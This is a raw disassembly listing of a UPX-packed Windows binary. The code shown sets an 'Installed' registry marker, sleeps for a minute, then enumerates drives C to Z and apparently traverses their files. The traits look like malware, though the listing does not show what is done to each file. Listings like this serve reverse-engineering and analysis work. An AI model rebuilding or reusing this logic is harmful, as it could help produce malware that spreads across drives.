mov edx, ebx
call sub_403380
mov eax, [ebp+var_201C]
lea edx, [ebp+var_2018]
call sub_408280
mov eax, [ebp+var_2018]
call sub_40A848
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_40AD87
; ---------------------------------------------------------------------------
loc_40AD7D: ; DATA XREF: sub_40AC70+CF�o
jmp sub_402B34
; ---------------------------------------------------------------------------
call sub_402D08
loc_40AD87: ; CODE XREF: sub_40AC70+C0�j
; sub_40AC70+CA�j ...
add [ebp+var_14], 20h
dec [ebp+var_10]
jnz short loc_40AD1D
loc_40AD90: ; CODE XREF: sub_40AC70+9A�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40ADAE
loc_40AD9D: ; CODE XREF: sub_40AC70+13C�j
mov eax, [ebp+var_4]
push eax
call sub_405750
retn
; ---------------------------------------------------------------------------
loc_40ADA7: ; DATA XREF: sub_40AC70+55�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40AD9D
; ---------------------------------------------------------------------------
loc_40ADAE: ; CODE XREF: sub_40AC70+4C�j
; sub_40AC70+8F�j
; DATA XREF: ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40ADD3
loc_40ADBB: ; CODE XREF: sub_40AC70+161�j
lea eax, [ebp+var_201C]
mov edx, 2
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_40ADCC: ; DATA XREF: sub_40AC70+2F�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40ADBB
; ---------------------------------------------------------------------------
loc_40ADD3: ; CODE XREF: sub_40AC70+15B�j
; DATA XREF: sub_40AC70+146�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40AC70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40ADDC proc near ; CODE XREF: sub_40AF30+24�p
var_8 = dword ptr -8
var_4 = byte ptr -4
add esp, 0FFFFFFF8h
push esp
push 2001Fh
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_405668 ; RegOpenKeyExA
test eax, eax
jnz short loc_40AE3D
push 0
push 0
push 0
push 0
push offset aInstalled ; "Installed"
mov eax, [esp+1Ch+var_8]
push eax
call sub_405670 ; RegQueryValueExA
test eax, eax
jnz short loc_40AE1A
call sub_403090
; ---------------------------------------------------------------------------
loc_40AE1A: ; CODE XREF: sub_40ADDC+37�j
push 4
lea eax, [esp+0Ch+var_4]
push eax
push 4
push 0
push offset aInstalled ; "Installed"
mov eax, [esp+1Ch+var_8]
push eax
call sub_405678 ; RegSetValueExA
mov eax, [esp+8+var_8]
push eax
call sub_405660 ; RegCloseKey
loc_40AE3D: ; CODE XREF: sub_40ADDC+1C�j
pop ecx
pop edx
retn
sub_40ADDC endp
; ---------------------------------------------------------------------------
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
; DATA XREF: sub_40ADDC+B�o
align 4
aInstalled db 'Installed',0 ; DATA XREF: sub_40ADDC+26�o
; sub_40ADDC+49�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE80 proc near ; DATA XREF: UPX0:0040AF2C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40AE9F
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40AEA6
loc_40AE9E: ; CODE XREF: sub_40AE80+24�j
retn
; ---------------------------------------------------------------------------
loc_40AE9F: ; DATA XREF: sub_40AE80+6�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40AE9E
; ---------------------------------------------------------------------------
loc_40AEA6: ; CODE XREF: sub_40AE80:loc_40AE9E�j
; DATA XREF: sub_40AE80+19�o
pop ebp
retn
sub_40AE80 endp
; ---------------------------------------------------------------------------
dword_40AEA8 dd 10h, 40AEB0h, 405658h, 405628h, 4053F4h, 40538Ch, 4057B0h
; DATA XREF: sub_40AF30+C�o
; UPX0:off_40C4AC�o
dd 405780h, 405A70h, 405A40h, 4094BCh, 40937Ch, 40956Ch
dd 40953Ch, 409604h, 4095D4h, 409654h, 409624h, 40A3FCh
dd 40A37Ch, 40A560h, 40A530h, 40A528h, 40A4F8h, 40A4F0h
dd 40A4C0h, 40A4B8h, 40A488h, 40A480h, 40A450h, 40A598h
dd 40A568h, 0
dd offset sub_40AE80
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40AF30 proc near ; CODE XREF: start+18B�j
var_10 = dword ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor eax, eax
mov [ebp+var_10], eax
mov eax, offset dword_40AEA8
call sub_4055F4
xor eax, eax
push ebp
push offset loc_40AFC6
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_40ADDC
push 0EA60h
call sub_405740 ; Sleep
mov bl, 43h
loc_40AF65: ; CODE XREF: sub_40AF30+77�j
lea eax, [ebp+var_10]
mov edx, ebx
call sub_403370
mov edx, [ebp+var_10]
mov eax, offset dword_40C640
mov ecx, offset dword_40AFDC
call sub_403470
mov eax, dword_40C640
call sub_403534
push eax
call sub_4056E0 ; GetDriveTypeA
add eax, 0FFFFFFFEh
sub eax, 3
jnb short loc_40AFA3
mov eax, dword_40C640
call sub_40A848
loc_40AFA3: ; CODE XREF: sub_40AF30+67�j
inc ebx
cmp bl, 5Bh
jnz short loc_40AF65
xor eax, eax
call sub_40AC70
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40AFCD
loc_40AFBD: ; CODE XREF: sub_40AF30+9B�j
lea eax, [ebp+var_10]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_40AFC6: ; DATA XREF: sub_40AF30+19�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40AFBD
; ---------------------------------------------------------------------------
loc_40AFCD: ; CODE XREF: sub_40AF30+95�j
; DATA XREF: sub_40AF30+88�o
pop ebx
call sub_403090
sub_40AF30 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_40AFDC dd 5C3Ah, 8 dup(0)word_40B000 dw 1332h ; DATA XREF: sub_4027C4+6�r
; sub_4027C4:loc_40283C�r ...
align 4
byte_40B004 db 0 ; DATA XREF: sub_402A4C�r sub_402A68�r ...
align 4
byte_40B008 db 0 ; DATA XREF: sub_402B34+52�r
; sub_402B34:loc_402BC1�r
align 4
byte_40B00C db 0 ; DATA XREF: sub_403090:loc_4030EC�r
align 10h
off_40B010 dd offset sub_409FD0 ; DATA XREF: UPX0:off_40B40C�o
off_40B014 dd offset sub_40A228 ; DATA XREF: UPX0:off_40B334�o
off_40B018 dd offset asc_40B064+44h ; DATA XREF: sub_4042D4�r sub_40470C�r ...
dword_40B01C dd 0 off_40B020 dd offset sub_401F94 ; DATA XREF: sub_402554+4�r
; sub_402584+3F�r
off_40B024 dd offset sub_40211C ; DATA XREF: sub_40256C+4�r
; sub_402584+26�r
off_40B028 dd offset sub_402490 ; DATA XREF: sub_402584+D�r
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_403090+46�o
; sub_403090+6C�o
align 4
aError db 'Error',0 ; DATA XREF: sub_403090+67�o
align 4
byte_40B054 db 30h ; DATA XREF: sub_40300C+3D�r
db 31h, 32h, 33h
dd 37363534h, 42413938h, 46454443h
asc_40B064 db ' ',0Dh
; DATA XREF: sub_404D23:loc_404D25�o
db 0Ah
db '',0
align 4
dword_40B0AC dd 400000h dd 2 dup(0)
dword_40B0B8 dd 400000h ; sub_4055A8+34�w
align 10h
dword_40B0C0 dd 0 dword_40B0C4 dd 2 dword_40B0C8 dd 5 dword_40B0CC dd 1 dword_40B0D0 dd 0A28h dword_40B0D4 dd 860874h, 1C001Fh, 2 dup(1E001Fh), 1F001Fh, 2 dup(1F001Eh)
; DATA XREF: sub_408140+3B�o
; UPX0:00409490�o
dd 1D001Fh, 2 dup(1E001Fh), 1F001Fh, 2 dup(1F001Eh)
dword_40B108 dd 0 ; sub_408198+1B�r ...
dd 7 dup(0)
off_40B128 dd offset dword_406450 ; DATA XREF: UPX0:004093D7�o
; UPX0:004094F3�o
dword_40B12C dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_408778:loc_408799�r ...
off_40B130 dd offset off_405888 ; DATA XREF: sub_406924+43�r
; UPX0:00408AA8�o
off_40B134 dd offset dword_40588C+4 ; DATA XREF: UPX0:00408A9C�o
off_40B138 dd offset off_405910 ; DATA XREF: sub_407250+3A�o
; UPX0:00408A90�o
off_40B13C dd offset dword_405914+4 ; DATA XREF: UPX0:00408A84�o
off_40B140 dd offset dword_405914+0Ch ; DATA XREF: UPX0:00408A78�o
off_40B144 dd offset dword_405914+14h ; DATA XREF: UPX0:00408A6C�o
off_40B148 dd offset dword_405914+1Ch ; DATA XREF: UPX0:00408A60�o
off_40B14C dd offset dword_405914+24h ; DATA XREF: UPX0:00408A54�o
off_40B150 dd offset dword_405914+2Ch ; DATA XREF: UPX0:00408A48�o
off_40B154 dd offset dword_405914+34h ; DATA XREF: UPX0:00408A3C�o
off_40B158 dd offset dword_405914+3Ch ; DATA XREF: UPX0:00408A30�o
off_40B15C dd offset dword_405914+44h ; DATA XREF: UPX0:00408A24�o
off_40B160 dd offset dword_405914+4Ch ; DATA XREF: UPX0:00408A18�o
off_40B164 dd offset dword_405914+54h ; DATA XREF: UPX0:00408A0C�o
off_40B168 dd offset off_405970 ; DATA XREF: sub_407250+5D�o
; UPX0:00408A00�o
off_40B16C dd offset loc_405974+4 ; DATA XREF: UPX0:004089F4�o
off_40B170 dd offset loc_40597F+1 ; DATA XREF: UPX0:004089E8�o
off_40B174 dd offset loc_405987+1 ; DATA XREF: UPX0:004089DC�o
off_40B178 dd offset off_405990 ; DATA XREF: UPX0:004089D0�o
off_40B17C dd offset off_405998 ; DATA XREF: UPX0:004089C4�o
off_40B180 dd offset off_4059A0 ; DATA XREF: UPX0:004089B8�o
off_40B184 dd offset dword_4059A4+4 ; DATA XREF: UPX0:004089AC�o
off_40B188 dd offset dword_4059A4+0Ch ; DATA XREF: UPX0:004089A0�o
off_40B18C dd offset dword_4059A4+14h ; DATA XREF: UPX0:00408994�o
off_40B190 dd offset dword_4059A4+1Ch ; DATA XREF: UPX0:00408988�o
off_40B194 dd offset dword_4059A4+24h ; DATA XREF: UPX0:0040897C�o
off_40B198 dd offset off_4059D0 ; DATA XREF: sub_407250+A9�o
; UPX0:00408970�o
off_40B19C dd offset dword_4059D4+4 ; DATA XREF: UPX0:00408964�o
off_40B1A0 dd offset dword_4059D4+0Ch ; DATA XREF: UPX0:00408958�o
off_40B1A4 dd offset dword_4059D4+14h ; DATA XREF: UPX0:0040894C�o
off_40B1A8 dd offset dword_4059D4+1Ch ; DATA XREF: UPX0:00408940�o
off_40B1AC dd offset dword_4059D4+24h ; DATA XREF: UPX0:00408934�o
off_40B1B0 dd offset dword_4059D4+2Ch ; DATA XREF: UPX0:00408928�o
off_40B1B4 dd offset off_405A08 ; DATA XREF: sub_407250+CE�o
; UPX0:0040891C�o
off_40B1B8 dd offset dword_405A0C+4 ; DATA XREF: UPX0:00408910�o
off_40B1BC dd offset dword_405A0C+0Ch ; DATA XREF: UPX0:00408904�o
off_40B1C0 dd offset dword_405A0C+14h ; DATA XREF: UPX0:004088F8�o
off_40B1C4 dd offset dword_405A0C+1Ch ; DATA XREF: UPX0:004088EC�o
off_40B1C8 dd offset dword_405A0C+24h ; DATA XREF: UPX0:004088E0�o
dd offset dword_405A0C+2Ch
dword_40B1D0 dd 2 ; UPX0:004093C2�o
dword_40B1D4 dd 86042Ch dd 3, 86040Ch, 4, 8603ECh, 5, 8603CCh
dword_40B1F0 dd 64h dd 8603A8h, 65h, 860390h, 6Ah, 86036Ch
off_40B208 dd offset aEdivbyzeror@ ; DATA XREF: UPX0:004093AD�o
; "\nEDivByZero]@"
dd 86034Ch, 405DD4h, 86032Ch, 405E2Ch, 86030Ch, 405EE0h
dd 8602DCh, 405F38h, 8602B0h, 405F90h, 86028Ch, 405FE8h
dd 860264h, 40609Ch, 860240h, 406154h, 860200h, 4061B4h
dd 8601DCh, 406268h, 8601C0h, 40620Ch, 8601A4h, 4062C0h
dd 860178h, 4062C0h, 860150h, 4062C0h, 860120h, 4062C0h
dd 8600F4h, 4062C0h, 8600D0h, 4062C0h, 8600A0h, 40631Ch
dd 860080h, 405CC4h, 86005Ch, 4063D8h, 860038h, 406434h
dd 86000Ch
dword_40B2B8 dd 0 dword_40B2BC dd 4 dup(0) ; UPX0:off_40B32C�o
dword_40B2CC dd 774FFA6Bh dword_40B2D0 dd 774FEF6Bh ; sub_40A304+18�r ...
dword_40B2D4 dd 77596178h dword_40B2D8 dd 77596182h dword_40B2DC dd 775274DCh dword_40B2E0 dd 77527567h dword_40B2E4 dd 0FFFFFFFFh ; sub_40A304+21�r ...
dword_40B2E8 dd 0 dd offset dword_409778+14h
dd offset dword_409778+28h
dd offset dword_4097A8+8
off_40B2F8 dd offset dword_405914+14h ; DATA XREF: UPX0:00408A70�o
dd offset dword_40588C+1Ch
dd offset dword_4057D4+14h
off_40B304 dd offset loc_405974+4 ; DATA XREF: UPX0:004089F8�o
off_40B308 dd offset dword_4059A4+14h ; DATA XREF: UPX0:00408998�o
off_40B30C dd offset dword_405A0C+14h ; DATA XREF: UPX0:004088FC�o
off_40B310 dd offset byte_40C028 ; DATA XREF: UPX0:0040A42B�r
off_40B314 dd offset dword_405914+34h ; DATA XREF: UPX0:00408A40�o
off_40B318 dd offset off_40C01C ; DATA XREF: sub_408008+9B�r
off_40B31C dd offset off_4058D8 ; DATA XREF: sub_407F2C+73�r
off_40B320 dd offset dword_405A0C+24h ; DATA XREF: UPX0:004088E4�o
off_40B324 dd offset off_40C004 ; DATA XREF: sub_408008+57�r
; sub_4080D4+34�r
off_40B328 dd offset off_405A08 ; DATA XREF: UPX0:00408920�o
off_40B32C dd offset dword_40B2BC ; DATA XREF: sub_409BA8+25F�r
; sub_409ED8+AD�r
off_40B330 dd offset dword_405914+1Ch ; DATA XREF: UPX0:00408A64�o
off_40B334 dd offset off_40B014 ; DATA XREF: UPX0:0040A3AF�r
; UPX0:0040A415�r
off_40B338 dd offset off_40960C ; DATA XREF: sub_409808+5A�r
dd offset dword_4057D4+2Ch
off_40B340 dd offset dword_405A0C+4 ; DATA XREF: UPX0:00408914�o
off_40B344 dd offset dword_4059D4+1Ch ; DATA XREF: UPX0:00408944�o
off_40B348 dd offset dword_405A0C+0Ch ; DATA XREF: UPX0:00408908�o
off_40B34C dd offset off_40C010 ; DATA XREF: sub_408008+6D�r
; sub_4080D4+46�r
off_40B350 dd offset byte_40C049 ; DATA XREF: sub_40A304+39�r
; sub_40A304:loc_40A35F�r
off_40B354 dd offset off_4057D0 ; DATA XREF: sub_407B04+44�r
off_40B358 dd offset off_405880 ; DATA XREF: sub_40788C+3F�r
off_40B35C dd offset off_4057C8 ; DATA XREF: sub_408008+18�r
off_40B360 dd offset dword_405914+3Ch ; DATA XREF: UPX0:00408A34�o
dd offset dword_4057D4+34h
off_40B368 dd offset off_405888 ; DATA XREF: UPX0:00408AAC�o
off_40B36C dd offset off_405900 ; DATA XREF: sub_407CA0+10�r
off_40B370 dd offset off_4059A0 ; DATA XREF: UPX0:004089BC�o
off_40B374 dd offset dword_40C21C ; DATA XREF: sub_40788C+22�r
off_40B378 dd offset dword_4059A4+1Ch ; DATA XREF: UPX0:0040898C�o
dd offset dword_4058BC+0Ch
off_40B380 dd offset off_40C008 ; DATA XREF: sub_408008+7A�r
; sub_4080D4+4F�r
off_40B384 dd offset loc_40597F+1 ; DATA XREF: UPX0:004089EC�o
off_40B388 dd offset off_40C000 ; DATA XREF: sub_408008+62�r
; sub_4080D4+3D�r
off_40B38C dd offset off_40C00C ; DATA XREF: sub_408008+85�r
; sub_4080D4+58�r
off_40B390 dd offset dword_4059A4+24h ; DATA XREF: UPX0:00408980�o
dd offset dword_40585C+4
dd offset dword_40585C+0Ch
off_40B39C dd offset dword_4059D4+2Ch ; DATA XREF: UPX0:0040892C�o
dd offset dword_4057D4+4
dd offset dword_4057D4+4Ch
off_40B3A8 dd offset dword_40588C+4 ; DATA XREF: UPX0:00408AA0�o
dd offset dword_4058BC+4
off_40B3B0 dd offset off_405970 ; DATA XREF: UPX0:00408A04�o
dd offset dword_4058E4+4
off_40B3B8 dd offset off_405998 ; DATA XREF: UPX0:004089C8�o
dd offset dword_40588C+14h
off_40B3C0 dd offset off_4057B8 ; DATA XREF: sub_406F14+3D�r
off_40B3C4 dd offset off_40C034 ; DATA XREF: UPX0:0040A435�r
; UPX0:0040A441�r
off_40B3C8 dd offset loc_405987+1 ; DATA XREF: UPX0:004089E0�o
off_40B3CC dd offset dword_4059A4+4 ; DATA XREF: UPX0:004089B0�o
dd offset dword_40588C+0Ch
off_40B3D4 dd offset dword_405914+4 ; DATA XREF: UPX0:00408A88�o
off_40B3D8 dd offset dword_405914+44h ; DATA XREF: UPX0:00408A28�o
off_40B3DC dd offset dword_4059D4+14h ; DATA XREF: UPX0:00408950�o
dd offset dword_4057D4+24h
dd offset dword_4057D4+64h
off_40B3E8 dd offset off_405990 ; DATA XREF: UPX0:004089D4�o
off_40B3EC dd offset off_405848 ; DATA XREF: sub_408008+39�r
off_40B3F0 dd offset dword_4059D4+24h ; DATA XREF: UPX0:00408938�o
dd offset dword_4057D4+6Ch
off_40B3F8 dd offset off_4059D0 ; DATA XREF: UPX0:00408974�o
off_40B3FC dd offset off_40C018 ; DATA XREF: sub_408008+90�r
; sub_4080D4+61�r
dd offset dword_4058E4+0Ch
off_40B404 dd offset off_4058B8 ; DATA XREF: sub_407D60+54�r
off_40B408 dd offset dword_405A0C+1Ch ; DATA XREF: UPX0:004088F0�o
off_40B40C dd offset off_40B010 ; DATA XREF: UPX0:0040A3B8�r
; UPX0:0040A40A�r
off_40B410 dd offset off_4057C0 ; DATA XREF: sub_407090+38�r
dd offset dword_4057D4+1Ch
off_40B418 dd offset off_4058E0 ; DATA XREF: sub_407BC8+38�r
off_40B41C dd offset dword_4059A4+0Ch ; DATA XREF: UPX0:004089A4�o
off_40B420 dd offset dword_4059D4+4 ; DATA XREF: UPX0:00408968�o
off_40B424 dd offset off_409614 ; DATA XREF: sub_409EA4+19�r
off_40B428 dd offset byte_40C048 ; DATA XREF: sub_40788C+14�r
off_40B42C dd offset dword_4059D4+0Ch ; DATA XREF: UPX0:0040895C�o
dd offset dword_4058BC+14h
off_40B434 dd offset off_40C014 ; DATA XREF: UPX0:0040A3A6�r
; UPX0:0040A420�r
off_40B438 dd offset off_405908 ; DATA XREF: sub_407D60+110�r
off_40B43C dd offset byte_40C04A ; DATA XREF: sub_40A5A0+42�r
; sub_40A5A0+55�r
off_40B440 dd offset dword_405914+2Ch ; DATA XREF: UPX0:00408A4C�o
off_40B444 dd offset off_4058F8 ; DATA XREF: sub_407BC8+63�r
off_40B448 dd offset dword_405914+4Ch ; DATA XREF: UPX0:00408A1C�o
dd offset dword_405A0C+2Ch
off_40B450 dd offset off_40961C ; DATA XREF: sub_409FB8�r
off_40B454 dd offset dword_405914+0Ch ; DATA XREF: UPX0:00408A7C�o
off_40B458 dd offset off_405858 ; DATA XREF: sub_407D60+16C�r
dd offset dword_4057D4+0Ch
dd offset dword_40585C+14h
dd offset dword_4057D4+44h
dd offset dword_4057D4+3Ch
off_40B46C dd offset dword_405914+54h ; DATA XREF: UPX0:00408A10�o
dd offset dword_4057D4+54h
off_40B474 dd offset off_405910 ; DATA XREF: UPX0:00408A94�o
off_40B478 dd offset off_405878 ; DATA XREF: sub_407704+DE�r
dd offset dword_40584C+4
dd offset dword_4057D4+5Ch
off_40B484 dd offset off_4058B0 ; DATA XREF: sub_407D60+45�r
off_40B488 dd offset dword_405914+24h ; DATA XREF: UPX0:00408A58�o
dd 2DDh dup(0)
off_40C000 dd offset sub_407FF8 ; DATA XREF: UPX0:00402E75�r
; UPX0:off_40B388�o
off_40C004 dd offset sub_407B84 ; DATA XREF: sub_4025D4+3�r
; UPX0:off_40B324�o
off_40C008 dd offset loc_407D4C ; DATA XREF: UPX0:off_40B380�o
off_40C00C dd offset sub_407F2C ; DATA XREF: sub_402B34+25�r
; UPX0:00402E53�r ...
off_40C010 dd offset dword_405AF4 ; DATA XREF: UPX0:off_40B34C�o
off_40C014 dd offset sub_409AA8 ; DATA XREF: UPX0:off_40B434�o
off_40C018 dd offset sub_407C84 ; DATA XREF: UPX0:off_40B3FC�o
off_40C01C dd offset sub_407CA0 ; DATA XREF: UPX0:off_40B318�o
dword_40C020 dd 400000h dword_40C024 dd 6B8h byte_40C028 db 0 ; DATA XREF: sub_402FA0+22�w
; UPX0:off_40B310�o
align 4
dword_40C02C dd 0Ah dword_40C030 dd 142340h off_40C034 dd offset sub_40A304 ; DATA XREF: UPX0:off_40B3C4�o
dword_40C038 dd 0 ; sub_40305C+24�w ...
dword_40C03C dd 0 dword_40C040 dd 0 ; sub_40300C+2A�r ...
dword_40C044 dd 0 byte_40C048 db 0 ; DATA XREF: sub_403090+3D�r
; UPX0:off_40B428�o
byte_40C049 db 0 ; DATA XREF: sub_4018C0+1B�r
; sub_4018C0:loc_401962�r ...
byte_40C04A db 2 ; DATA XREF: UPX0:00405427�w
; UPX0:off_40B43C�o
byte_40C04B db 2 ; DATA XREF: UPX0:0040542E�w
byte_40C04C db 3 ; DATA XREF: UPX0:00405435�w
align 10h
dword_40C050 dd 0 ; sub_404B34:loc_404B57�o ...
dd 0D7B0h, 80h, 2 dup(0)
dd offset dword_40C19C
dd offset loc_404894
dd 4Ch dup(0)
dword_40C19C dd 20h dup(0) dword_40C21C dd 0 ; sub_404CB8:loc_404CF3�o ...
dd 0D7B0h, 80h, 2 dup(0)
dd offset dword_40C368
dd offset loc_404894
dd 4Ch dup(0)
dword_40C368 dd 20h dup(0) off_40C3E8 dd offset sub_403CC4 ; DATA XREF: sub_403CCC+22�r
; sub_403D10:loc_403D36�r ...
off_40C3EC dd offset sub_403CBC ; DATA XREF: sub_403DAC+34�r
; UPX0:0040546B�w
off_40C3F0 dd offset sub_403CC4 ; DATA XREF: sub_403D10+64�r
; UPX0:00405475�w
word_40C3F4 dw 0 ; DATA XREF: UPX0:004053D2�o
; UPX0:0040543C�w
align 4
dd 3 dup(0)
word_40C404 dw 1 ; DATA XREF: UPX0:004053C8�o
; UPX0:00405445�w
align 4
dd 3 dup(0)
word_40C414 dw 0Ah ; DATA XREF: UPX0:004053BE�o
; UPX0:0040544E�w
align 4
dd 0
dword_40C41C dd 80020004h dd 0
dword_40C424 dd 51h ; sub_401EA0+92�w ...
dword_40C428 dd 700h ; sub_401EA0+9B�w ...
dword_40C42C dd 0FFFFFFFFh ; UPX0:00405405�w
byte_40C430 db 1 ; DATA XREF: sub_4018C0+8E�w
; sub_4018C0:loc_40197D�r ...
align 4
dword_40C434 dd 0 ; sub_401600+63�w ...
dword_40C438 dd 145350h, 0FFFFFFFFh, 4 dup(0) ; sub_4018C0+24�o ...
dword_40C450 dd 1463C0h ; sub_401234+2A�w ...
dword_40C454 dd 1469C4h ; sub_4012BC+A�r ...
dword_40C458 dd 1469F4h ; sub_40143C+51�o ...
dd 1469F4h, 2 dup(0)
dword_40C468 dd 2 dup(1469E4h), 2 dup(0) ; sub_401710+E�o ...
off_40C478 dd offset off_40C478 ; DATA XREF: sub_4018C0+7F�o
; UPX0:off_40C478�o ...
off_40C47C dd offset off_40C478 ; DATA XREF: sub_401EA0:loc_401EB0�r
dd 0
off_40C484 dd offset off_40C478 ; DATA XREF: sub_4018C0+89�w
; sub_401A64+1�r ...
dword_40C488 dd 3758h dword_40C48C dd 8608A4h ; sub_401D3C+2E�r ...
dword_40C490 dd 1453C0h ; sub_4018C0+5D�r ...
dword_40C494 dd 1469D4h ; sub_401984+81�o ...
dd 1469D4h, 2 dup(0)
dword_40C4A4 dd 0 dword_40C4A8 dd 12FFB4h ; sub_402EB8+2�r
off_40C4AC dd offset dword_40AEA8 ; DATA XREF: sub_402F40+6�r sub_402FA0�w
dword_40C4B0 dd 10h ; sub_402FA0+8�w
dword_40C4B4 dd 40B0A8h dword_40C4B8 dd 0 dword_40C4BC dd 0 dd 4 dup(0)
byte_40C4D0 db 0 ; DATA XREF: sub_405564�r
byte_40C4D1 db 0 ; DATA XREF: UPX0:004094EA�r
align 4
TlsIndex dd 0 ; DATA XREF: sub_405514+A�r
; sub_405514+3C�r ...
dd 0
dword_40C4DC dd 400000h ; sub_4055F4+E�w ...
dword_40C4E0 dd 0FFFFFFFFh ; UPX0:00405658�w
dword_40C4E4 dd 0 ; sub_405564:loc_405595�r
dword_40C4E8 dd 0FFFFFFFFh ; UPX0:004057B0�w
dword_40C4EC dd 0FFFFFFFFh ; UPX0:00405A70�w
dword_40C4F0 dd 860778h ; sub_408D30+1�r ...
byte_40C4F4 db 0 ; DATA XREF: sub_4083E0+7B�w
; sub_408CD9+2�r
byte_40C4F5 db 0 ; DATA XREF: sub_4083E0+9F�w
; sub_408CD9+13�r
byte_40C4F6 db 2Ch ; DATA XREF: sub_4083E0+B2�w
; sub_408C78+38�r ...
byte_40C4F7 db 2Eh ; DATA XREF: sub_4083E0+C5�w
; sub_408B9E+21�r ...
byte_40C4F8 db 2 ; DATA XREF: sub_406AC7+281�r
; sub_4083E0+E9�w
byte_40C4F9 db 2Fh ; DATA XREF: sub_4083E0+FC�w
align 4
dword_40C4FC dd 8607B8h ; UPX0:0040947C�o
dword_40C500 dd 8607D0h ; UPX0:00409472�o
byte_40C504 db 3Ah ; DATA XREF: sub_4083E0+169�w
align 4
dword_40C508 dd 8607F0h ; UPX0:00409468�o
dword_40C50C dd 860800h ; UPX0:0040945E�o
dword_40C510 dd 860840h ; UPX0:00409454�o
dword_40C514 dd 860858h ; UPX0:0040944A�o
dword_40C518 dd 8604B4h, 8604D8h, 860500h, 860524h, 860548h, 860568h
; DATA XREF: sub_407250+29�o
; UPX0:00409435�o
dd 86058Ch, 8605B0h, 8605D4h, 8605FCh, 860620h, 860648h
dword_40C548 dd 8604C4h, 8604E8h, 860510h, 860534h, 860558h, 860578h
; DATA XREF: sub_407250+2E�o
; UPX0:00409420�o
dd 86059Ch, 8605C0h, 8605E4h, 86060Ch, 860630h, 860658h
dword_40C578 dd 860670h, 860694h, 8606B8h, 8606DCh, 860704h, 86072Ch
; DATA XREF: sub_407250+8A�o
; UPX0:0040940B�o
dd 860750h
dword_40C594 dd 860680h, 8606A4h, 8606C8h, 8606ECh, 860714h, 86073Ch
; DATA XREF: sub_407250+8F�o
; UPX0:004093F6�o
dd 860760h
dword_40C5B0 dd 409h word_40C5B4 dw 9 ; DATA XREF: sub_4074D8+5B�r
dw 1
dword_40C5B8 dd 0 ; sub_408210+8�r ...
dword_40C5BC dd 6 dup(0) dword_40C5D4 dd 0 ; sub_4073B0+43�w
dword_40C5D8 dd 7 dup(0) byte_40C5F4 db 2Ch ; DATA XREF: sub_4083E0+2AB�w
align 4
dword_40C5F8 dd 0FFFFFFFFh ; UPX0:004094CD�w
dword_40C5FC dd 86045Ch ; sub_408008+31�w ...
dword_40C600 dd 860498h ; sub_408008+52�w ...
dword_40C604 dd 0 dword_40C608 dd 0FFFFFFFFh ; UPX0:0040956C�w
dword_40C60C dd 0FFFFFFFFh ; UPX0:00409604�w
dword_40C610 dd 0FFFFFFFFh ; UPX0:00409654�w
dword_40C614 dd 0FFFFFFFFh ; UPX0:0040A3FC�w
byte_40C618 db 0 ; DATA XREF: UPX0:0040A395�w
align 4
dword_40C61C dd 0 dword_40C620 dd 0 byte_40C624 db 0 ; DATA XREF: sub_40A304+34�w
; sub_40A304+70�w ...
align 4
dword_40C628 dd 0FFFFFFFFh ; UPX0:0040A480�w
dword_40C62C dd 0FFFFFFFFh ; UPX0:0040A4B8�w
dword_40C630 dd 0FFFFFFFFh ; UPX0:0040A4F0�w
dword_40C634 dd 0FFFFFFFFh ; UPX0:0040A528�w
dword_40C638 dd 0FFFFFFFFh ; UPX0:0040A560�w
dword_40C63C dd 0FFFFFFFFh ; UPX0:0040A598�w
dword_40C640 dd 8608A0h ; sub_40AF30+51�r ...
align 1000h
UPX0 ends
; Section 2. (virtual address 0000D000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 0000D000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 40D000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
